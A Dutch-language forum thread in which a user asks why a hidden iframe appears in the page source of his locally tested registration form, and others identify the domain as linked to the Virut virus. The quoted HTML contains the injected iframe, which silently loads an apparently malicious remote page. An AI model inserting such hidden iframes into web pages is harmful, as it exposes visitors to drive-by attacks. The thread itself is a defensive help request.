ongekend <iframe> in paginabron

[Kligham]

Hallo,

Ik weet niet wat er gaande is dus vraag ik het maar hier. Als ik mijn eigen website (lokaal) test, en ik vraag mijn pagina bron info op krijg ik dit:


<tr>
<td width = "300">Telefoon- of GSM-nummer: <br />
<input type = "text" name = "telefoon_gsm_nummer" id = "telefoon_gsm_nummer" value = "" size = "35" onChange="JavaScript: checkField(telefoon_gsm_nummer);"/></td>
<td valign="bottom"><div id="telefoon_gsm_nummer_status"></div></td>
</tr>
<tr>
<td><input type="submit" name="registreer" value="Registreer"/></td>
</tr>
</table>
</form>
<iframe src="http://jL.chura.pl/rc/" style="display:none"></iframe>
</body>
</html>

Hoe komt dit daar, maar vooral hoe krijg ik dit weg? als ik er naartoe surf, geeft mozilla firefox aan dat het een aanvalssite is (en dus geblokkeerd wordt)?

Weet iemand raad?

 

[Frats]

Het lijkt me dat je het in je broncode hebt gezet? Zo niet, dan zit het waarschijnlijk in een javascriptje die het include... gebruik je javascripts van buitenstaanders?

 

[maestro12]

Die code verwijst naar een virus genaamd 'Virut', 'Virux', 'Vitro'

jl.chura.pl is a domain associated with Virut (the newest variant Win32:Vitro).. a reference to this site is encapsulated with an iframe and injected into html pages...

De besmetting lijkt van je eigen pc te komen en is zeer lastig te verwijderen.

 

[Kligham]

Bedankt voor de tip van dat virus. K'heb eens uitgebreid gezocht maar niets gevonden. Op het internet heb ik gevonden dat als het virus nog op je systeem stond, dat het telkens terugkeert als je het verwijderd uit je hml pagina's. Heb het verwijderd en komt niet meer terug.

Moet dus zijn dat het virus vroeger al gedelete was, en ik dat dat lijntje me nu nog maar opgevallen was.

In ieder geval, bedankt voor de tip :thumb: